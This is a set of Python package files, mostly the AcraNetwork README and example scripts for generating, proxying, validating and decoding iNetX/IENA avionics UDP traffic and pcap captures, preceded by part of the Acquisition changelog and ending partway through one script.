- Fix the ``tp_name`` of the ImplicitAcquisitionWrapper and
ExplicitAcquisitionWrapper to match their Python visible names and thus have
a correct ``__name__``.
- Expand the ``tp_name`` of our extension types to hold the fully qualified
name. This ensures classes have their ``__module__`` set correctly.
2.13.0 (2010-02-14)
-------------------
- Added support for method cache in Acquisition. Patch contributed by
Yoshinori K. Okuji. See https://bugs.launchpad.net/zope2/+bug/486182.
2.12.4 (2009-10-29)
-------------------
- Fix iteration proxying to pass `self` acquisition-wrapped into both
`__iter__` as well as `__getitem__` (this fixes
https://bugs.launchpad.net/zope2/+bug/360761).
- Add tests for the __getslice__ proxying, including open-ended slicing.
2.12.3 (2009-08-08)
-------------------
- More 64-bit fixes in Py_BuildValue calls.
- More 64-bit issues fixed: Use correct integer size for slice operations.
2.12.2 (2009-08-02)
-------------------
- Fixed 64-bit compatibility issues for Python 2.5.x / 2.6.x. See
http://www.python.org/dev/peps/pep-0353/ for details.
2.12.1 (2009-04-15)
-------------------
- Update for iteration proxying: The proxy for `__iter__` must not rely on the
object to have an `__iter__` itself, but also support fall-back iteration via
`__getitem__` (this fixes https://bugs.launchpad.net/zope2/+bug/360761).
2.12 (2009-01-25)
-----------------
- Release as separate package.
| Acquisition | /Acquisition-4.4.4-cp33-cp33m-win_amd64.whl/Acquisition-4.4.4.dist-info/DESCRIPTION.rst | DESCRIPTION.rst |
AcraNetwork
===========
A collection of classes that can be used to decom network or PCM based FTI traffic
Summary
~~~~~~~
* iNetX : Class for packing and unpacking iNetX objects
* IENA : Class for packing and unpacking IENA objects
* SimpleEthernet : A simplified set of classes for Ethernet, IP and UDP packets. These are not fully featured but are sufficient for the network systems used in KAM500 networks
* Pcap : Class and helper methods for reading pcap files
* McastSocket : Class to bind to ports to capture multicast packets
Install
~~~~~~~
Install using the standard setuptools install method
.. code-block::
python setup.py install
or clone this repository to your local directory
.. code-block::
git clone https://github.com/diarmuidcwc/AcraNetwork.git
Usage
~~~~~
Here are two brief examples: reading a pcap file and building an iNetX packet for transmission. Further examples
can be viewed in the examples directory or in the unittest folder.
To read in a pcap file with multiple ethernet packets all containing an iNetX packet wrapped in UDP
.. code-block:: python
import AcraNetwork.iNetX as inetx
import AcraNetwork.SimpleEthernet as SimpleEthernet
import AcraNetwork.Pcap as pcap
import struct
mypcap = pcap.Pcap("inetx_test.pcap") # Read the pcap file
for mypcaprecord in mypcap:
ethpacket = SimpleEthernet.Ethernet() # Create an Ethernet object
ethpacket.unpack(mypcaprecord.packet) # Unpack the pcap record into the eth object
ippacket = SimpleEthernet.IP() # Create an IP packet
ippacket.unpack(ethpacket.payload) # Unpack the ethernet payload into the IP packet
udppacket = SimpleEthernet.UDP() # Create a UDP packet
udppacket.unpack(ippacket.payload) # Unpack the IP payload into the UDP packet
inetxpacket = inetx.iNetX() # Create an iNetx object
inetxpacket.unpack(udppacket.payload) # Unpack the UDP payload into this iNetX object
print("INETX: StreamID ={:08X} Sequence = {:8d} PTP Seconds = {}".format(inetxpacket.streamid,inetxpacket.sequence,inetxpacket.ptptimeseconds))
To Make a Distribution
~~~~~~~~~~~~~~~~~~~~~~
.. code-block::
pip install --upgrade pip wheel setuptools twine
python ./setup.py bdist_wheel --universal
twine upload dist/*
| AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/README.rst | README.rst |
# -*- coding: utf-8 -*-
"""
=====
Sending IENA packets
=====
Simplified IENA packet generator. Sends one fixed size packet at the specified rate
Can be used as a base for generating more complex configurations
"""
__author__ = "Diarmuid Collins"
__copyright__ = "Copyright 2023"
__version__ = "0.1.0"
__maintainer__ = "Diarmuid Collins"
__email__ = "[email protected]"
__status__ = "Production"
import sys
sys.path.append("..")
import time
import struct
import AcraNetwork.SimpleEthernet as eth
import AcraNetwork.IENA as iena
import argparse
import socket
import signal
import datetime
def create_parser():
# Argument parser
parser = argparse.ArgumentParser(description='Send IENA packets at a specified rate')
parser.add_argument('--rate', required=False, type=float, default=1.0, help="Packet rate in Mbps")
parser.add_argument('--ipaddress', required=False, type=str, default="192.168.0.26", help="Destination IP")
return parser
def accurate_sleep(duration, get_now=time.perf_counter):
now = get_now()
end = now + duration
while now < end:
now = get_now()
def main(args):
dst_udp_port = 4444
# open a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Get the accurate size of the packet
FCS_LEN = 4
PREAMBLE = 8
hdr_lens = eth.UDP.UDP_HEADER_SIZE + eth.IP.IP_HEADER_SIZE + eth.Ethernet.HEADERLEN + FCS_LEN + PREAMBLE
# Work out the usecond timestamp
now = datetime.datetime.now()
seconds_since_jan1st = (now - now.replace(day=1, month=1, hour=0, minute=0, second=0, microsecond=0)).total_seconds()
useconds_since_jan1st = int(seconds_since_jan1st * 1e6)
# Create an inetx packet
myiena = iena.IENA()
myiena.key = 0xDC
myiena.keystatus = 0x0
myiena.status = 0x0
myiena.timeusec = useconds_since_jan1st
myiena.payload = struct.pack(">700H", *(range(700)))
myiena.sequence = 0
# Figure how much of a gap between packets
_payload_len = len(myiena.pack())
total_vol_data = 0
chunk_count_ps = args.rate * 1e6/(_payload_len * 8)
tx_time_vol = total_vol_data * 8 * 1e-9
gap_per_pkt = (1 - tx_time_vol) / (chunk_count_ps)
if gap_per_pkt <= 0:
gap_per_pkt = 0
print("UDP target IP:", args.ipaddress)
print("UDP target port:", dst_udp_port)
print("Rate = {} Mbps".format(args.rate))
print("DLY = {:.6f} s".format(gap_per_pkt))
# keep a track of the packets sent
sequence_roll_over = pow(2, 16)
packet_count = 1
vol_data_sent = 0
# Handle the user interruption gracefully
def signal_handler(*args):
print(f"Exiting. Sent {packet_count:>12,} packets and {vol_data_sent:>15,} bytes")
sys.exit()
signal.signal(signal.SIGINT, signal_handler)
# loop forever
while True:
mypayload = myiena.pack()
sock.sendto(mypayload, (args.ipaddress, dst_udp_port))
vol_data_sent += (len(mypayload) + hdr_lens)
# Increment the sequence number
myiena.sequence = (myiena.sequence + 1) % sequence_roll_over
# Add to the timeuseconds
myiena.timeusec += int(gap_per_pkt * 1e6)
# Sleep
accurate_sleep(gap_per_pkt)
# Information
packet_count += 1
if packet_count % 100 == 0:
print(f"{packet_count:>12,} packets sent. {vol_data_sent:>18,} bytes send.")
if __name__ == '__main__':
parser = create_parser()
pargs = parser.parse_args()
main(pargs)
sys.exit(0) | AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/examples/tx_iena_udp.py | tx_iena_udp.py |
__author__ = "Diarmuid Collins"
__copyright__ = "Copyright 2018"
__version__ = "0.1.0"
__maintainer__ = "Diarmuid Collins"
__email__ = "[email protected]"
__status__ = "Production"
import sys
sys.path.append("..")
import socket
import argparse
import AcraNetwork.iNetX as inetx
import AcraNetwork.IENA as iena
import AcraNetwork.McastSocket as McastSocket
VERSION = __version__
parser = argparse.ArgumentParser(description='Proxy iNetX or IENA packets to UDP')
parser.add_argument('--ipaddress', type=str, default="235.0.0.1", required=True, help='The multicast IP address on which the iNetX or IENA packets are being transmitted')
parser.add_argument('--inetx', type=int, default=None, required=False, help='Receiving iNetX packets on this UDP port. Either this argument or --iena should be supplied')
parser.add_argument('--iena', type=int, default=None, required=False, help='Receiving IENA packets on this UDP port')
parser.add_argument('--udp', type=int, default=None, required=True, help='Transmit UDP packets on this UDP port')
parser.add_argument('--version', action='version', version='%(prog)s {}'.format(VERSION))
args = parser.parse_args()
if not (args.inetx or args.iena):
print(parser.print_help())
sys.exit(1)
# The incoming iNetx port
if args.inetx:
incoming_udp_port = args.inetx
else:
incoming_udp_port = args.iena
# Outgoing UDP port
outgoing_udp_port = args.udp
#------------------------------------------------------------
# Setup a socket to receive all traffic
#------------------------------------------------------------
try:
recv_socket = McastSocket.McastSocket(local_port=incoming_udp_port, reuse=1)
recv_socket.mcast_add(args.ipaddress, '0.0.0.0')
recv_socket.settimeout(10)
except:
print("Can't bind to socket {} on multicast {}".format(incoming_udp_port, args.ipaddress))
exit()
tx_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet_count = 1
while True:
# Capture some data
try:
data, addr = recv_socket.recvfrom(2048) # buffer size is 1500 bytes
except socket.timeout:
print("ERROR: No incoming packets received on UDP port {} on multicast {}. Timeout on socket".format(
incoming_udp_port, args.ipaddress))
exit()
(udpsrcport,srcipaddr) = addr
# Decode it as iNetx
if args.inetx:
avionics_packet = inetx.iNetX()
else:
avionics_packet = iena.IENA()
try:
avionics_packet.unpack(data)
except ValueError:
# This isn't an inetx packet
continue
else:
packet_count += 1
# Transmit the _payload back out
tx_socket.sendto(avionics_packet.payload, (args.ipaddress, outgoing_udp_port))
# Print some info for the user
if packet_count % 50 == 0:
print(".")
else:
print(".",) | AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/examples/proxy_to_udp.py | proxy_to_udp.py |
# Very rudimentary (but fast) validation of recorded data
# Finds all inetx packets and validates that no sequence numbers are missing
# It will also take the url to an axn mem and verify data after downloading
import sys
sys.path.append("..")
sys.path.append(".")
import AcraNetwork.Pcap as pcap
import glob
import os.path
import struct
import time
import logging
import argparse
import json
from urllib.parse import urlparse
from urllib.request import urlopen
from os import mkdir, remove
import datetime
from dataclasses import dataclass, field
import typing
VERSION = "0.4.0"
logging.basicConfig(
level=logging.INFO, format="%(levelname)-6s %(asctime)-15s %(message)s"
)
@dataclass
class Streams:
streamid: int
sequence: int
pkt_count: int
start_ts: float
end_ts: float
dropcnt: int
rstcnt: int
length: int
datavol: int
sequence_list: typing.List[int] = field(default_factory=list)
def pps(self) -> int:
if self.end_ts - self.start_ts <= 0:
return 0
return int(self.pkt_count / (self.end_ts - self.start_ts))
def bitrate(self) -> int:
if self.end_ts - self.start_ts <= 0:
return 0
return int(self.length * 8 * self.pkt_count / (self.end_ts - self.start_ts))
def timelen(self) ->float:
return self.end_ts - self.start_ts
def drops_to_hist(self):
bins = 30
start_seq = self.sequence - self.pkt_count - self.dropcnt
bin_wdth = int((self.sequence - start_seq) / bins)
bin_cnt = [0] * bins
for i in range(bins):
for s in self.sequence_list:
#print(f"{i}:{start_seq}:{s}:{bin_wdth}")
if (start_seq + bin_wdth * i) <= s < (start_seq + bin_wdth * (i + 1)):
bin_cnt[i] += 1
rstring = "|"
for cnt in bin_cnt:
if cnt == 0:
rstring += " "
else:
if cnt > 9:
cnt = "*"
rstring += f"{cnt}"
rstring += "|"
return rstring
def create_parser():
# Argument parser
parser = argparse.ArgumentParser(
description="Validate inetx sequence numbers quickly in a pcap file"
)
# Common
parser.add_argument(
"--folder",
type=str,
required=True,
default=None,
help="folder to parser for pcap files. Can be a URL",
)
parser.add_argument(
"--verbose",
required=False,
action="store_true",
default=False,
help="verbose mode",
)
parser.add_argument(
"--summary",
required=False,
action="store_true",
default=False,
help="only print summaries per file",
)
parser.add_argument(
"--control",
type=int,
required=False,
default=0x11000000,
help="control field value",
)
parser.add_argument(
"--histogram",
required=False,
action="store_true",
default=False,
help="print a rough histogram of where the drops happened",
)
parser.add_argument(
"--version", action="version", version="%(prog)s {}".format(VERSION)
)
return parser
# recorder data
# tcpdump -i eth0 -W 999 -C 1000 -n -K -s 2000 -w rec.pcap.
def uri_validator(x):
try:
result = urlparse(x)
return all([result.scheme, result.netloc])
except:
return False
def main(args):
roll_over = pow(2, 32)
fnames = {}
if uri_validator(args.folder):
is_url = True
all_files = []
with urlopen(args.folder) as response:
response_content = response.read()
json_resp = json.loads(response_content)
for f, e in json_resp.items():
all_files.append(e["url"])
fnames[e["url"]] = f
else:
is_url = False
# Find all the files and sort by extension
all_files = glob.glob(os.path.join(args.folder, "*.pcap*"))
all_files.sort()
# For recording the data
streams: typing.Dict[int, Streams] = {}
inetx_pkts_validate = 0
data_count_bytes = 0
start_t = time.time()
loss_count = 0
loss_data = 0
total_pkt_count = 0
for pfile in all_files:
# To calculate the rate per pcap
first_pcap_time = None
last_pcap_time = None
packet_data_vol = 0
tmp_folder = "httpdl"
loss = 0
floss = 0
outf = ""
if is_url:
CHUNK = 32 * 1024
if not os.path.exists(tmp_folder):
mkdir(tmp_folder, 0o755)
outf = os.path.join(tmp_folder, fnames[pfile])
sd = time.time()
with urlopen(pfile) as response, open(outf, "wb") as out_file:
data_len = 0
while True:
chunk = response.read(CHUNK)
if not chunk:
break
data_len += len(chunk)
out_file.write(chunk)
dlspeed = data_len * 8 / (time.time() - sd) / 1e6
logging.info(
"Downloaded {} at {:.1f}Mbps and wrote to {}".format(
pfile, dlspeed, outf
)
)
p = pcap.Pcap(outf)
else:
p = pcap.Pcap(pfile)
prev_rec_ts = None
for i, r in enumerate(p):
if first_pcap_time is None:
first_pcap_time = r.sec + r.usec * 1e-6
last_pcap_time = r.sec + r.usec * 1e-6
# Do a check on the record timestamp
if prev_rec_ts is not None:
if prev_rec_ts > last_pcap_time:
delta = prev_rec_ts - last_pcap_time
logging.warning(
f"Record={i + 1} Record timestamp negative jump {delta}s")
prev_rec_ts = last_pcap_time
packet_data_vol += len(r.payload)
total_pkt_count += 1
if len(r.payload) >= (
26 + 0x28
): # For short packets don't try to decode them as inetx
# pull out the key fields
(
dst_port,
udp_len,
checksum,
control,
stream_id,
seq,
_len,
ptpsec,
ptpnsec
) = struct.unpack_from(">HHHIIIIII", r.payload, 0x24)
if control == args.control:
if stream_id in streams:
stream = streams[stream_id]
if seq != (stream.sequence + 1) % roll_over:
pkt_ts = datetime.datetime.fromtimestamp(
r.sec + r.usec * 1e-6
).strftime("%H:%M:%S.%f %d %b")
if seq < stream.sequence:
logging.warning(
"Source Restarted. File={} PktNum={} StreamID={:#0X} PrevSeq={} "
"CurSeq={}".format(
pfile,
i,
stream_id,
stream.sequence,
seq,
)
)
stream.rstcnt += 1
else:
loss = seq - ((stream.sequence + 1) % roll_over)
if not args.summary:
logging.error(
"File={} TS={} PktNum={} StreamID={:#0X} PrevSeq={} CurSeq={} Lost={} Lost={:,} bytes".format(
pfile,
pkt_ts,
i,
stream_id,
stream.sequence,
seq,
loss,
loss * stream.length
)
)
loss_count += loss
loss_data += (loss * stream.length)
stream.dropcnt += loss
stream.sequence_list.append(stream.sequence + 1)
floss += loss
stream.sequence = seq
stream.pkt_count += 1
stream.end_ts = ptpsec + ptpnsec/1e9
stream.datavol += len(r.payload)
else:
stream = Streams(stream_id, seq, 1, ptpsec + ptpnsec/1e9,
ptpsec + ptpnsec/1e6, 0, 0, len(r.payload),
len(r.payload), [])
streams[stream_id] = stream
inetx_pkts_validate += 1
data_count_bytes += len(r.payload)
p.close()
# The data rate at which we are validating
try:
dr = (data_count_bytes * 8) / (1e6 * (time.time() - start_t))
except:
dr = 100
try:
ave_rec_rate_mbps = (
(packet_data_vol * 8) / (last_pcap_time - first_pcap_time) / 1e6
)
except:
ave_rec_rate_mbps = 0
sids_found = len(streams)
if first_pcap_time is not None:
file_stamp = datetime.datetime.fromtimestamp(first_pcap_time).strftime(
"%H:%M:%S %d %b"
)
else:
file_stamp = "unknown"
info_str = (
f"In {os.path.basename(pfile)} starting at {file_stamp}, {inetx_pkts_validate:10} packets validated. "
f"Total_data={data_count_bytes/1e6:8.0f}KB Lost={floss:5} StreamsFound={sids_found:5} "
f"RecordRate={ave_rec_rate_mbps:5.0f}Mbps ValRate={dr:5.0f}Mbps"
)
if loss > 0:
logging.error(info_str)
else:
logging.info(info_str)
if args.verbose:
if len(streams) > 0:
logging.info(
"{:>7s} {:>9s} {:>9s} {:>9s} {:>9s}".format(
"SID", "Seq", "LostCount", "ResetCnt", "Length"
)
)
for sid, stream in streams.items():
logging.info(
"{:#07X} {:9d} {:9d} {:9d} {:9d}".format(
sid,
stream.sequence,
stream.dropcnt,
stream.rstcnt,
stream.length,
)
)
if is_url and loss == 0:
remove(outf)
elif is_url and not args.verbose:
remove(outf)
print("\n")
if len(streams) > 0:
logging.info(
"{:>7s} {:>15s} {:>9s} {:>9s} {:>9s} {:>9s} {:>9s} {:>18s} {:>12s} {:>12s} {:>12s}".format(
"SID", "Cnt", "LostCount", "ResetCnt", "Length", "PPS", "Mbps", "Elapsed Time(s)",
"DataVol(MB)", "DropVol(Bytes)", "BitRate(Mbps)"
)
)
for sid, stream in sorted(streams.items()):
if args.histogram:
_hist = stream.drops_to_hist()
else:
_hist = ""
logging.info(
"{:#07X} {:15,d} {:9d} {:9d} {:9d} {:9d} {:9.1f} {:18.1f} {:12,.1f} {:12,d} {:12,.1f} {}".format(
sid, stream.pkt_count, stream.dropcnt, stream.rstcnt, stream.length,
stream.pps(), stream.bitrate()/1e6, stream.timelen(), stream.datavol/1e6,
stream.dropcnt * stream.length, stream.datavol * 8 / (stream.timelen() * 1e6), _hist
)
)
print(
f"\nSUMMARY: RXPKTS={total_pkt_count:>15,} RXINETX={inetx_pkts_validate:>15,} "
f"RXBYTES={data_count_bytes//1024:>15,.1f} KB LOSTPKTS={loss_count:>15,} LOSTDATA={loss_data//1024:>15,.1f} KB"
)
if __name__ == "__main__":
parser = create_parser()
args = parser.parse_args()
main(args)
sys.exit(0) | AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/examples/validate_pcap.py | validate_pcap.py |
__author__ = "Diarmuid Collins"
__copyright__ = "Copyright 2018"
__version__ = "0.0.1"
__maintainer__ = "Diarmuid Collins"
__email__ = "[email protected]"
__status__ = "Production"
import sys
sys.path.append("..")
import os,struct
import argparse
import AcraNetwork.iNetX as inetx
import AcraNetwork.Pcap as pcap
import AcraNetwork.SimpleEthernet as SimpleEthernet
def main():
#----------------------------------
# Setup the command line parser
#----------------------------------
parser = argparse.ArgumentParser(description='Dump out the _payload of iNetX packets as ASCII representations')
parser.add_argument('--pcap', required=True, action='append', help='The input pcap file(s)')
parser.add_argument('--hex', required=False, action='store_true', default=False, help='Print the hex representation not the ASCII coded version')
parser.add_argument('--outdir', required=False, default="out", help='Name of output directory. Default is out')
args = parser.parse_args()
#------------------------------------------------------------
# Now read the input.
#------------------------------------------------------------
# The input will take multiple pcap files and loop through each
# Keep a track of the position in the line for each streamID
output_byte_count ={}
for pcapfilename in args.pcap:
try:
pcapfile = pcap.Pcap(pcapfilename)
except IOError:
print("ERROR: File {} not found".format(pcapfilename))
exit()
if not os.path.exists(args.outdir):
os.mkdir(args.outdir)
for pcaprecord in pcapfile:
eth = SimpleEthernet.Ethernet()
eth.unpack(pcaprecord.packet)
ip = SimpleEthernet.IP()
ip.unpack(eth.payload)
udp_packet = SimpleEthernet.UDP()
udp_packet.unpack(ip.payload)
(ctrl_word,) = struct.unpack('>I',udp_packet.payload[:4])
if ctrl_word == 0x11000000:
inetx_packet = inetx.iNetX()
# Unpack the udp _payload as an iNetx packet
inetx_packet.unpack(udp_packet.payload)
# Do we want to dump out an ascii or hex output
if args.hex == True:
prefix = "hex"
else:
prefix = "ascii"
# Create an output file per streamID and open it
output_file_name = "{}/{}_{:08X}.txt".format(args.outdir,prefix,inetx_packet.streamid)
# NB: We are appending to the file here so if you have existing files in the directory then it will be appended
output_file = open(output_file_name,'a')
# Start the byte count per streamID
if inetx_packet.streamid not in output_byte_count:
output_byte_count[inetx_packet.streamid] = 1
# Go thorough each byte in the _payload. Not particularly efficient
for offset in range(len(inetx_packet.payload)):
# Unpack the _payload as an unsigned integer
(byte_in_ascii,) =struct.unpack_from('B', inetx_packet.payload, offset)
# Write the output depending on what you want
if args.hex == True:
output_file.write("{:02X} ".format(byte_in_ascii))
else:
# Only some ASCII codes are printable so don't print out
# the non printable ones. Emulate the wireshark method of printing a period
if byte_in_ascii < 31 or byte_in_ascii > 126:
printable_string = "."
else:
printable_string = chr(byte_in_ascii)
output_file.write("{}".format(printable_string))
# Create a new line after 16 bytes for readability
if (output_byte_count[inetx_packet.streamid] % 16 == 0):
output_file.write('\n')
output_byte_count[inetx_packet.streamid] += 1
print("Output files created in {} directory".format(args.outdir))
if __name__ == '__main__':
main() | AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/examples/pcap_to_ascii.py | pcap_to_ascii.py |
__author__ = "Diarmuid Collins"
__copyright__ = "Copyright 2018"
__version__ = "0.0.1"
__maintainer__ = "Diarmuid Collins"
__email__ = "[email protected]"
__status__ = "Production"
import sys
sys.path.append("..")
import AcraNetwork.Pcap as pcap
import AcraNetwork.iNetX as inetx
import AcraNetwork.MPEGTS as mpegts
import AcraNetwork.SimpleEthernet as eth
from AcraNetwork.MPEGTS import H264
import datetime
# This script shows how to parse either a pcap file or a TS file into the constituent
# NALS and finds the unique STANAG SEI User data with the timestamp
def pcap_to_ts(pcapfile,ts_file,udp_port=8010):
'''
Convert a pcap file to a TS file by extracting all data from a specified port
:param mpegfile: str
:param ts_file: str
:param udp_port: int
:return:
'''
mpegpcap = pcap.Pcap(pcapfile, mode='r')
ts = open(ts_file, mode='wb')
mpeghex = ""
rec_count = 0
for rec in mpegpcap:
try:
e = eth.Ethernet()
e.unpack(rec.packet)
i = eth.IP()
i.unpack(e.payload)
u = eth.UDP()
u.unpack(i.payload)
if u.dstport == udp_port:
rec_count += 1
inet = inetx.iNetX()
inet.unpack(u.payload)
mpegtspackets = mpegts.MPEGTS()
mpegtspackets.unpack(inet.payload)
for packet in mpegtspackets.blocks:
mpeghex += packet.payload
ts.write(inet.payload)
except:
continue
def parse_ts_file(tsfile):
ts_file = open(tsfile,mode='rb')
h264_data = H264()
h264_data.unpack(ts_file.read())
nal_counts = {}
timestamp_count = 0
for nal in h264_data.nals:
if not nal.type in nal_counts:
nal_counts[nal.type] = 1
else:
nal_counts[nal.type] += 1
if nal.type == mpegts.NAL_TYPES["SEI"]:
if nal.sei.unregdata:
print("Timestamp={} byte offset={} count ={}".format(datetime.datetime.strftime(nal.sei.time,"%d %b %Y %H:%M:%S.%f"),nal.offset,timestamp_count))
timestamp_count += 1
else:
pass
print("\n----- SUMMARY -----")
for type in nal_counts:
print("{} {} NALs in input".format(nal_counts[type],mpegts.NAL_TYPES_INV[type]))
print("{} STANAG Timestamps".format(timestamp_count))
def main():
# Read in a TS file and print out some useful information
parse_ts_file("../test/stanag_sample.ts")
if __name__ == "__main__":
main() | AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/examples/parse_mpeg_pcap.py | parse_mpeg_pcap.py |
# -*- coding: utf-8 -*-
"""
=====
Sending UDP packets
=====
Send UDP packets at a specific rate
This can be customised by providing an ini file. Format:
[inetxpayloadlength]
min=1300
max=1400
[randomisation]
#distribution=uniform
distribution=beta
alpha=3
beta=1
[tweaks]
packetbuildtime=0.0000070
"""
__author__ = "Diarmuid Collins"
__copyright__ = "Copyright 2018"
__version__ = "0.4.0"
__maintainer__ = "Diarmuid Collins"
__email__ = "[email protected]"
__status__ = "Production"
import sys
sys.path.append("..")
import time
import struct
import AcraNetwork.iNetX as inetx
import AcraNetwork.SimpleEthernet as eth
import argparse
import socket
import random
import signal
import configparser
from collections import namedtuple
from dataclasses import dataclass
ConfigSetting = namedtuple("ConfigSetting", ['min', 'max', 'dist', 'alpha', 'beta', 'buildtime', 'accuratets'])
NANOSECS = int(1e9)
@dataclass
class TS:
sec: int
nsec: int
def add(self, gap):
ns = int(gap * 1e9)
_dlt = self.nsec + ns
self.nsec = (_dlt % NANOSECS)
self.sec += int(_dlt/NANOSECS)
def pack(self):
return struct.pack(">II", self.sec, self.nsec)
def get_default_settings(configfile: str) -> ConfigSetting:
config = configparser.ConfigParser()
config.read(configfile)
min = int(config.get('inetxpayloadlength', 'min', fallback='64'))
max = int(config.get('inetxpayloadlength', 'max', fallback='1400'))
dist = (config.get('randomisation', 'distribution', fallback='uniform'))
alpha = float(config.get('randomisation', 'alpha', fallback='3.0'))
beta = float(config.get('randomisation', 'beta', fallback='1.0'))
buildtime = float(config.get('tweaks', 'packetbuildtime', fallback='0.0000070'))
accuratets = int(config.get('tweaks', 'accuratetimestamp', fallback='0'))
print(f"Payload Length= {min} to {max}, Distribution={dist} (alpha={alpha} beta={beta}) Tweak={buildtime}")
return ConfigSetting(min, max, dist, alpha, beta, buildtime, accuratets)
def create_parser():
# Argument parser
parser = argparse.ArgumentParser(description='Send iNetX packets at a specified rate')
parser.add_argument('--rate', required=False, type=float, default=1.0, help="Packet rate in Mbps")
parser.add_argument('--ipaddress', required=False, type=str, default="192.168.0.26", help="Destination IP")
parser.add_argument('--config', required=False, type=str, default="", help="Destination IP")
parser.add_argument('--maxpps', required=False, type=int, default=None, help="Specify a max pps value")
parser.add_argument('--datavol', required=False, type=int, default=None, help="Stop after specified bytes")
parser.add_argument('--sidcount', required=False, type=int, default=1, help="number of stream ids to send")
return parser
def accurate_sleep(duration, get_now=time.perf_counter):
now = get_now()
end = now + duration
while now < end:
now = get_now()
def main(args):
dst_udp_port = 4444
cfg = get_default_settings(args.config)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Create an inetx packet
myinetx = inetx.iNetX()
payload_pkts = {}
bsid = random.randint(0x0, 0xFF) << 8
FCS_LEN = 4
PREAMBLE = 8
hdr_lens = eth.UDP.UDP_HEADER_SIZE + eth.IP.IP_HEADER_SIZE + eth.Ethernet.HEADERLEN + FCS_LEN + PREAMBLE
tx_pkt_overhead = cfg.buildtime
total_vol_data = 0
timestamp = TS(int(time.time()), 0)
for idx in range(args.sidcount):
myinetx.inetxcontrol = inetx.iNetX.DEF_CONTROL_WORD
myinetx.pif = 0
myinetx.streamid = bsid + idx
myinetx.sequence = 0
if cfg.dist == "beta":
myinetx.payload = struct.pack(">B", idx+1) * int((cfg.max - cfg.min) * random.betavariate(cfg.alpha, cfg.beta) + cfg.min)
else:
myinetx.payload = struct.pack(">B", idx+1) * random.randint(cfg.min, cfg.max)
myinetx.setPacketTime(timestamp.sec)
packet_payload = myinetx.pack()
print("iNetX StreamID={:#0X} Length incl headers={}".format(myinetx.streamid, len(packet_payload) + hdr_lens))
payload_pkts[myinetx.streamid] = {
'payload': packet_payload, 'length': len(packet_payload) + eth.UDP.UDP_HEADER_SIZE + eth.IP.IP_HEADER_SIZE
+ eth.Ethernet.HEADERLEN}
pkt_len = len(packet_payload) + 8 + 20 + 14
total_vol_data += (pkt_len + hdr_lens)
chunk_count_ps = args.rate * 1e6/(total_vol_data * 8)
tx_time_vol = total_vol_data * 8 * 1e-9
gap_per_pkt = (1 - tx_time_vol) / (args.sidcount * chunk_count_ps) - tx_pkt_overhead
if gap_per_pkt <= 0:
gap_per_pkt = 0
if args.datavol is None:
expected_end_time = "unknown"
else:
expected_end_time = int(args.datavol * 8 / args.rate /60)
pps = int(args.sidcount * chunk_count_ps)
if args.maxpps is not None:
if pps > args.maxpps:
raise Exception(f"The specified combination has generated a pps of {pps}, creater than {args.maxpps}")
print("UDP target IP:", args.ipaddress)
print("UDP target port:", dst_udp_port)
print("Rate = {} Mbps".format(args.rate))
print("DLY = {:.6f} s".format(gap_per_pkt))
print("PPS = {} s".format(pps))
sequence_roll_over = pow(2, 64)
pkt_count = {}
for sid in payload_pkts.keys():
pkt_count[sid] = 0
packet_count = 1
vol_data_sent = 0
def signal_handler(*args):
print(f"Exiting. Sent {packet_count:>12,} packets and {vol_data_sent:>15,} bytes")
sys.exit()
signal.signal(signal.SIGINT, signal_handler)
run_sec = 0
while True:
random_sid = bsid + (packet_count % args.sidcount)
random_payload = payload_pkts[random_sid]["payload"]
if cfg.accuratets:
mypayload = random_payload[:8] + struct.pack(">I", pkt_count[random_sid]) + \
random_payload[12:16] + timestamp.pack() + random_payload[24:]
timestamp.add(gap_per_pkt)
else:
mypayload = random_payload[:8] + struct.pack(">I", pkt_count[random_sid]) + \
random_payload[12:]
# Faster way to build an inetx packet instead of packing the whole header
pkt_count[random_sid] = (pkt_count[random_sid] + 1) % sequence_roll_over
sock.sendto(mypayload, (args.ipaddress, dst_udp_port))
vol_data_sent += (len(mypayload) + hdr_lens)
accurate_sleep(gap_per_pkt)
packet_count += 1
if packet_count % (pps * 30) == 0:
run_sec += 30
if args.datavol is not None:
expected_end_time = int((args.datavol - vol_data_sent) * 8 /(args.rate * 1e6) / 60)
if vol_data_sent > args.datavol:
signal_handler()
print(f"After {run_sec:>8} seconds : {packet_count:>12,} packets sent. {vol_data_sent:>18,} bytes send."
f"End in {expected_end_time} minutes")
if __name__ == '__main__':
parser = create_parser()
pargs = parser.parse_args()
main(pargs)
sys.exit(0) | AcraNetwork | /AcraNetwork-0.16.1.tar.gz/AcraNetwork-0.16.1/examples/tx_inetx_udp.py | tx_inetx_udp.py |
import socket,os,struct,sys
import argparse
import datetime, time
import AcraNetwork.iNetX as inetx
import AcraNetwork.Pcap as pcap
from AcraNetwork.SimpleEthernet import mactoreadable
import AcraNetwork.ParserAligned as ParserAligned
def main():
#----------------------------------
# Setup the command line parser
#----------------------------------
parser = argparse.ArgumentParser(description='Analyse a pcap file looking for iNetX parser aligned packets')
parser.add_argument('--pcap', required=True, action='append', help='The dump pcap packet')
args = parser.parse_args()
#------------------------------------------------------------
# Now read the input.
#------------------------------------------------------------
# The input will take multiple pcap files and loop through each
for pcapfilename in args.pcap:
try:
pcapfile = pcap.Pcap(pcapfilename)
except IOError:
print("ERROR: File {} not found".format(pcapfilename))
exit()
packet_count = 1
start_of_run = time.time() # benchmarking
while True:
try:
# So we loop through the file one packet at a time. This will eventually return an
# exception at the end of file so handle that when it occurs
(eth_packet,ip_packet,udp_packet) = pcapfile._readNextUDPPacket()
if udp_packet.isinetx: # This is a rough guess assuming the control word is 0x11000000
inetx_packet = inetx.iNetX()
inetx_packet.unpack(udp_packet.payload)
readablemac = mactoreadable(eth_packet.srcmac) # handy function to return the mac address in a readable format
output_format = "SRCMAC={:>20s} SRCIP={:>15s} DSTPORT={:5d} StreamID={:#5x} Sequence={:10d}"
